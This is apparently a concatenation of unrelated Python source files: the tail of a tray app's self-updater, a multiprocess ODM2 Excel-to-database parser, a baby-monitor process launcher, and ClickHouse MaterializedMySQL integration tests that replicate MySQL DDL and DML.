logger.debug("downloading %s to %s" % (url,os.path.join(os.path.dirname(sys.argv[0]), newfilename)))
urllib.request.urlretrieve(url, os.path.join(os.path.dirname(sys.argv[0]), newfilename))
except Exception as e:
os.system("taskkill /F /im sstvProxy.exe")
urllib.request.urlretrieve(url, os.path.join(os.path.dirname(sys.argv[0]), newfilename))
logger.info("Update forced")
logger.debug("Gathering version")
self.version = float(json.loads(urllib.request.urlopen(self.url).read().decode('utf-8'))['Version'])
self.save_data()
if install and platform.system() == 'Linux':
os.chmod(os.path.join(os.path.dirname(sys.argv[0]), ntpath.basename(url)), 0o777)
if restart:
os.system('cls' if os.name == 'nt' else 'clear')
logger.info(u"YAP is restarting...")
self.tray_start()
def main():
app = QtGui.QApplication(sys.argv)
w = QtGui.QWidget()
trayIcon = SystemTrayIcon(QtGui.QIcon('logo_tray.ico'), w)
signal.signal(signal.SIGINT, signal.SIG_DFL)
trayIcon.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
excelParserProcess.py
|
import functools
from multiprocessing import Pool
import multiprocessing
import threading
from threading import Thread
import string
import time
import numpy as np
import pandas as pd
from pandas import DataFrame, Series
from sqlalchemy.orm import scoped_session
from sqlalchemy.exc import IntegrityError, ProgrammingError
from pubsub import pub
from odm2api.models import Base, TimeSeriesResultValues, TimeSeriesResults, Units, setSchema
from odm2api.ODMconnection import dbconnection
from yodatools.excelparser.sessionWorker import SessionWorker
mute_x = multiprocessing.Lock()
print_lock = threading.Lock()
def update_output_text(message):
"""
Updates the Textctrl output window on the summary page
:param message: text to append to the output window (a newline is appended automatically)
:return: None
"""
message += '\n'
pub.sendMessage('controller.update_output_text', message=message)
def commit_tsrvs(session, tsrvs):
"""
commits TimeSeriesResultValues to database
:param session: an instance of `sqlalchemy.orm.Session`
:param tsrvs: a list of TimeSeriesResultValues
:return: None
"""
session.add_all(tsrvs)
try:
session.commit()
except (IntegrityError, ProgrammingError):
session.rollback()
for i in xrange(0, len(tsrvs)):
tsrv = tsrvs[i]
session.add(tsrv)
try:
session.commit()
except (IntegrityError, ProgrammingError) as e:
session.rollback()
mute_x.acquire()
print(e)
mute_x.release()
update_output_text('Error: %s' % e.message)
def p_target(queue, conn, thread_count): # type: (multiprocessing.JoinableQueue, str, int) -> None
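"""
Worker process loop: pull batches of TimeSeriesResultValues from the queue, split each
batch across `thread_count` SessionWorker threads that commit the values via commit_tsrvs,
then mark the queue item as done.
:param queue: JoinableQueue carrying lists of TimeSeriesResultValues
:param conn: database connection string
:param thread_count: number of worker threads per batch
"""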
session_factory = dbconnection.createConnectionFromString(conn)
engine = session_factory.engine
setSchema(engine)
Base.metadata.create_all(engine)
scoped_session_ = session_factory.Session # type: scoped_session
while True:
args = queue.get()
if args:
# create worker threads
workers = [None] * thread_count
tsrvs_split = np.array_split(args, thread_count)
for i in range(len(tsrvs_split)):
worker = SessionWorker(scoped_session_, print_lock, mute_x, target=commit_tsrvs, args=tsrvs_split[i].tolist())
worker.daemon = True
worker.start()
workers[i] = worker
# it's probably best to wait for these threads to finish before moving on...
for w in workers:
w.join()
queue.task_done()
def start_procs(conn, processes=1, threads=1): # type: (str, int, int) -> multiprocessing.Queue
"""
Starts background processes and returns a queue
:param conn: connection string to create database connections for each process
:param processes: the number of processes to create
:param threads: the number of threads per process to create
:return: a queue object used to send work to each process
"""
q = multiprocessing.JoinableQueue()
# create processes
procs = [None] * processes
for i in range(0, processes):
p = multiprocessing.Process(target=p_target, args=(q, conn, threads), name=string.letters[i])
p.daemon = True
procs[i] = p
# start each process
for p in procs:
p.start()
return q
|
__main__.py
|
from multiprocessing import Process, Value, Array
from helper_modules.continuous_queue import ContinuousQueue as Queue
from ctypes import c_bool
from pexpect import pxssh
import sys
import numpy as np
from audio._audio_routine import audio_routine
from video._video_routine import video_routine
from server._server_routine import server_routine
from control._control_routine import control_routine
from scipy.io import loadmat
# BEWARE! This code cannot be run from an IDE, as editors such as IPython prevent
# multiprocessing from working correctly. Use a command prompt or a similar
# environment, or run it directly with python.exe
if __name__ == '__main__':
# Initialize queues. The frame and audio queues are connected to the server process,
# but BGR and thermal frames are also fed into the control process via
# bgr_thermal_queue
bgr_thermal_queue = Queue(2)
frame_queue = Queue(5)
audio_queue = Queue(10)
faces_queue = Queue(1)
# Initialize transform matrix, a shared memory for video and control processes.
# NOTE TO SELF: give a sensible transform matrix for the initial case
shared_transform_matrix = Array('d', [ 9.37830895e-12, 1.00000000e+00, -3.96434172e-13,
8.62639189e-16, 2.35265233e-16, 5.09741339e-15,
-1.11682496e+01, -9.00591808e-03, 1.00000000e+00,
6.29504763e-04, 7.57604597e-17, -1.65846804e-15])
# Initialize shared memories for value types.
room_temp = Value('f', 23.5)
room_humid = Value('f', 36.09)
baby_temp = Value('f', 0.0)
baby_is_crying = Value(c_bool, False)
baby_feverish = Value(c_bool, False)
temp_offset = Value('f', 3.0)
# Load temperature map
temp_table = loadmat('source/control/temp_map_piecewise_linear.mat')['temp_v2']
temp_table = np.hstack((temp_table[4001:],temp_table[:4001]))
temp_dict = {int(a):b for a,b in temp_table}
# Initialize Process objects and target the necessary routines
audio_process = Process(name = 'audio_process',
target=audio_routine, args=(audio_queue, baby_is_crying))
video_process = Process(name = 'video_process',
target=video_routine, args=(frame_queue, bgr_thermal_queue,
temp_offset, temp_dict,
shared_transform_matrix, baby_is_crying,
faces_queue, baby_temp))
server_process = Process(name = 'server_process',
target=server_routine, args=(frame_queue, audio_queue,
room_temp, room_humid, baby_temp,
baby_is_crying,baby_feverish))
control_process = Process(name = 'control_process',
target=control_routine, args=(bgr_thermal_queue,
shared_transform_matrix,
room_temp, room_humid, baby_temp, temp_offset,
temp_dict, faces_queue, baby_feverish))
# Start the processes.
video_process.start()
audio_process.start()
control_process.start()
server_process.start()
|
materialize_with_ddl.py
|
import time
import pymysql.cursors
import pytest
from helpers.network import PartitionManager
import logging
from helpers.client import QueryRuntimeException
from helpers.cluster import get_docker_compose_path, run_and_check
import random
import threading
from multiprocessing.dummy import Pool
from helpers.test_tools import assert_eq_with_retry
def check_query(clickhouse_node, query, result_set, retry_count=10, interval_seconds=3):
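# Poll ClickHouse until `query` returns `result_set`, sleeping `interval_seconds`
# between attempts; if all retries are exhausted, assert on the final result.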
latest_result = ''
for i in range(retry_count):
try:
latest_result = clickhouse_node.query(query)
if result_set == latest_result:
return
logging.debug(f"latest_result {latest_result}")
time.sleep(interval_seconds)
except Exception as e:
logging.debug(f"check_query retry {i+1} exception {e}")
time.sleep(interval_seconds)
else:
assert clickhouse_node.query(query) == result_set
def dml_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
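# Replicate INSERT/UPDATE/DELETE (including a primary-key update) for a table covering
# most MySQL column types into a MaterializeMySQL database.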
mysql_node.query("DROP DATABASE IF EXISTS test_database_dml")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_dml")
mysql_node.query("CREATE DATABASE test_database_dml DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database_dml.test_table_1 ("
"`key` INT NOT NULL PRIMARY KEY, "
"unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
"unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
"unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
"unsigned_int INT UNSIGNED, _int INT, "
"unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
"unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
"/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
"unsigned_float FLOAT UNSIGNED, _float FLOAT, "
"unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
"_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
"/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
"_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
# it already has some data
mysql_node.query("""
INSERT INTO test_database_dml.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
""")
clickhouse_node.query(
"CREATE DATABASE test_database_dml ENGINE = MaterializeMySQL('{}:3306', 'test_database_dml', 'root', 'clickhouse')".format(
service_name))
assert "test_database_dml" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n")
mysql_node.query("""
INSERT INTO test_database_dml.test_table_1 VALUES(2, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', false);
""")
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t2020-01-01 00:00:00\t0\n")
mysql_node.query("UPDATE test_database_dml.test_table_1 SET unsigned_tiny_int = 2 WHERE `key` = 1")
check_query(clickhouse_node, """
SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,
small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer,
unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col,
_date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */
_bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV
""",
"1\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n")
# update primary key
mysql_node.query("UPDATE test_database_dml.test_table_1 SET `key` = 3 WHERE `unsigned_tiny_int` = 2")
check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
" small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
" unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
" _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
" _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
"varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n3\t2\t-1\t2\t-2\t3\t-3\t"
"4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t1\n")
mysql_node.query('DELETE FROM test_database_dml.test_table_1 WHERE `key` = 2')
check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
" small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
" unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
" _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
" _bool FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV",
"3\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
"2020-01-01 00:00:00\t1\n")
mysql_node.query('DELETE FROM test_database_dml.test_table_1 WHERE `unsigned_tiny_int` = 2')
check_query(clickhouse_node, "SELECT * FROM test_database_dml.test_table_1 ORDER BY key FORMAT TSV", "")
clickhouse_node.query("DROP DATABASE test_database_dml")
mysql_node.query("DROP DATABASE test_database_dml")
def materialized_mysql_database_with_views(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database.test_table_1 ("
"`key` INT NOT NULL PRIMARY KEY, "
"unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
"unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
"unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
"unsigned_int INT UNSIGNED, _int INT, "
"unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
"unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
"/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
"unsigned_float FLOAT UNSIGNED, _float FLOAT, "
"unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
"_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
"/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
"_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
mysql_node.query("CREATE VIEW test_database.test_table_1_view AS SELECT SUM(tiny_int) FROM test_database.test_table_1 GROUP BY _date;")
# it already has some data
mysql_node.query("""
INSERT INTO test_database.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
'2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
""")
clickhouse_node.query(
"CREATE DATABASE test_database ENGINE = MaterializedMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
service_name))
assert "test_database" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database FORMAT TSV", "test_table_1\n")
clickhouse_node.query("DROP DATABASE test_database")
mysql_node.query("DROP DATABASE test_database")
def materialized_mysql_database_with_datetime_and_decimal(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_dt")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_dt")
mysql_node.query("CREATE DATABASE test_database_dt DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_dt.test_table_1 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_1 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
clickhouse_node.query("CREATE DATABASE test_database_dt ENGINE = MaterializedMySQL('{}:3306', 'test_database_dt', 'root', 'clickhouse')".format(service_name))
assert "test_database_dt" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_dt.test_table_1 ORDER BY key FORMAT TSV",
"1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
"2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
"3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
"4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
mysql_node.query("CREATE TABLE test_database_dt.test_table_2 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
mysql_node.query("INSERT INTO test_database_dt.test_table_2 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
check_query(clickhouse_node, "SELECT * FROM test_database_dt.test_table_2 ORDER BY key FORMAT TSV",
"1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
"2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
"3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
"4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
clickhouse_node.query("DROP DATABASE test_database_dt")
mysql_node.query("DROP DATABASE test_database_dt")
def drop_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_drop")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_drop")
mysql_node.query("CREATE DATABASE test_database_drop DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_drop.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("DROP TABLE test_database_drop.test_table_1;")
mysql_node.query("CREATE TABLE test_database_drop.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("TRUNCATE TABLE test_database_drop.test_table_2;")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_drop ENGINE = MaterializedMySQL('{}:3306', 'test_database_drop', 'root', 'clickhouse')".format(
service_name))
assert "test_database_drop" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV", "")
mysql_node.query("INSERT INTO test_database_drop.test_table_2 VALUES(1), (2), (3), (4), (5), (6)")
mysql_node.query("CREATE TABLE test_database_drop.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_drop FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV",
"1\n2\n3\n4\n5\n6\n")
mysql_node.query("DROP TABLE test_database_drop.test_table_1;")
mysql_node.query("TRUNCATE TABLE test_database_drop.test_table_2;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_drop FORMAT TSV", "test_table_2\n")
check_query(clickhouse_node, "SELECT * FROM test_database_drop.test_table_2 ORDER BY id FORMAT TSV", "")
clickhouse_node.query("DROP DATABASE test_database_drop")
mysql_node.query("DROP DATABASE test_database_drop")
def create_table_like_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS create_like")
mysql_node.query("DROP DATABASE IF EXISTS create_like2")
clickhouse_node.query("DROP DATABASE IF EXISTS create_like")
mysql_node.query("CREATE DATABASE create_like")
mysql_node.query("CREATE DATABASE create_like2")
mysql_node.query("CREATE TABLE create_like.t1 (id INT NOT NULL PRIMARY KEY)")
mysql_node.query("CREATE TABLE create_like2.t1 LIKE create_like.t1")
clickhouse_node.query(
f"CREATE DATABASE create_like ENGINE = MaterializeMySQL('{service_name}:3306', 'create_like', 'root', 'clickhouse')")
mysql_node.query("CREATE TABLE create_like.t2 LIKE create_like.t1")
check_query(clickhouse_node, "SHOW TABLES FROM create_like", "t1\nt2\n")
mysql_node.query("USE create_like")
mysql_node.query("CREATE TABLE t3 LIKE create_like2.t1")
mysql_node.query("CREATE TABLE t4 LIKE t1")
check_query(clickhouse_node, "SHOW TABLES FROM create_like", "t1\nt2\nt4\n")
check_query(clickhouse_node, "SHOW DATABASES LIKE 'create_like%'", "create_like\n")
clickhouse_node.query("DROP DATABASE create_like")
mysql_node.query("DROP DATABASE create_like")
mysql_node.query("DROP DATABASE create_like2")
def create_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_create")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_create")
mysql_node.query("CREATE DATABASE test_database_create DEFAULT CHARACTER SET 'utf8'")
# existed before the mapping was created
mysql_node.query("CREATE TABLE test_database_create.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
# it already has some data
mysql_node.query("INSERT INTO test_database_create.test_table_1 VALUES(1), (2), (3), (5), (6), (7);")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_create ENGINE = MaterializedMySQL('{}:3306', 'test_database_create', 'root', 'clickhouse')".format(
service_name))
# Check for pre-existing status
assert "test_database_create" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SELECT * FROM test_database_create.test_table_1 ORDER BY id FORMAT TSV",
"1\n2\n3\n5\n6\n7\n")
mysql_node.query("CREATE TABLE test_database_create.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("INSERT INTO test_database_create.test_table_2 VALUES(1), (2), (3), (4), (5), (6);")
check_query(clickhouse_node, "SELECT * FROM test_database_create.test_table_2 ORDER BY id FORMAT TSV",
"1\n2\n3\n4\n5\n6\n")
clickhouse_node.query("DROP DATABASE test_database_create")
mysql_node.query("DROP DATABASE test_database_create")
def rename_table_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_rename")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_rename")
mysql_node.query("CREATE DATABASE test_database_rename DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_rename.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("RENAME TABLE test_database_rename.test_table_1 TO test_database_rename.test_table_2")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_rename ENGINE = MaterializedMySQL('{}:3306', 'test_database_rename', 'root', 'clickhouse')".format(
service_name))
assert "test_database_rename" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename FORMAT TSV", "test_table_2\n")
mysql_node.query("RENAME TABLE test_database_rename.test_table_2 TO test_database_rename.test_table_1")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_rename FORMAT TSV", "test_table_1\n")
clickhouse_node.query("DROP DATABASE test_database_rename")
mysql_node.query("DROP DATABASE test_database_rename")
def alter_add_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_add")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_add")
mysql_node.query("CREATE DATABASE test_database_add DEFAULT CHARACTER SET 'utf8'")
mysql_node.query("CREATE TABLE test_database_add.test_table_1 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_1 INT NOT NULL")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_2 INT NOT NULL FIRST")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1")
mysql_node.query("ALTER TABLE test_database_add.test_table_1 ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
"0" if service_name == "mysql57" else "(id)"))
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_add ENGINE = MaterializedMySQL('{}:3306', 'test_database_add', 'root', 'clickhouse')".format(
service_name))
assert "test_database_add" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "DESC test_database_add.test_table_1 FORMAT TSV",
"add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("CREATE TABLE test_database_add.test_table_2 (id INT NOT NULL PRIMARY KEY) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_add FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_add.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"ALTER TABLE test_database_add.test_table_2 ADD COLUMN add_column_1 INT NOT NULL, ADD COLUMN add_column_2 INT NOT NULL FIRST")
mysql_node.query(
"ALTER TABLE test_database_add.test_table_2 ADD COLUMN add_column_3 INT NOT NULL AFTER add_column_1, ADD COLUMN add_column_4 INT NOT NULL DEFAULT " + (
"0" if service_name == "mysql57" else "(id)"))
default_expression = "DEFAULT\t0" if service_name == "mysql57" else "DEFAULT\tid"
check_query(clickhouse_node, "DESC test_database_add.test_table_2 FORMAT TSV",
"add_column_2\tInt32\t\t\t\t\t\nid\tInt32\t\t\t\t\t\nadd_column_1\tInt32\t\t\t\t\t\nadd_column_3\tInt32\t\t\t\t\t\nadd_column_4\tInt32\t" + default_expression + "\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("INSERT INTO test_database_add.test_table_2 VALUES(1, 2, 3, 4, 5), (6, 7, 8, 9, 10)")
check_query(clickhouse_node, "SELECT * FROM test_database_add.test_table_2 ORDER BY id FORMAT TSV",
"1\t2\t3\t4\t5\n6\t7\t8\t9\t10\n")
clickhouse_node.query("DROP DATABASE test_database_add")
mysql_node.query("DROP DATABASE test_database_add")
def alter_drop_column_with_materialized_mysql_database(clickhouse_node, mysql_node, service_name):
mysql_node.query("DROP DATABASE IF EXISTS test_database_alter_drop")
clickhouse_node.query("DROP DATABASE IF EXISTS test_database_alter_drop")
mysql_node.query("CREATE DATABASE test_database_alter_drop DEFAULT CHARACTER SET 'utf8'")
mysql_node.query(
"CREATE TABLE test_database_alter_drop.test_table_1 (id INT NOT NULL PRIMARY KEY, drop_column INT) ENGINE = InnoDB;")
mysql_node.query("ALTER TABLE test_database_alter_drop.test_table_1 DROP COLUMN drop_column")
# create mapping
clickhouse_node.query(
"CREATE DATABASE test_database_alter_drop ENGINE = MaterializedMySQL('{}:3306', 'test_database_alter_drop', 'root', 'clickhouse')".format(
service_name))
assert "test_database_alter_drop" in clickhouse_node.query("SHOW DATABASES")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_drop FORMAT TSV", "test_table_1\n")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_1 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query(
"CREATE TABLE test_database_alter_drop.test_table_2 (id INT NOT NULL PRIMARY KEY, drop_column INT NOT NULL) ENGINE = InnoDB;")
check_query(clickhouse_node, "SHOW TABLES FROM test_database_alter_drop FORMAT TSV", "test_table_1\ntest_table_2\n")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\ndrop_column\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
mysql_node.query("ALTER TABLE test_database_alter_drop.test_table_2 DROP COLUMN drop_column")
check_query(clickhouse_node, "DESC test_database_alter_drop.test_table_2 FORMAT TSV",
"id\tInt32\t\t\t\t\t\n_sign\tInt8\tMATERIALIZED\t1\t\t\t\n_version\tUInt64\tMATERIALIZED\t1\t\t\t\n")
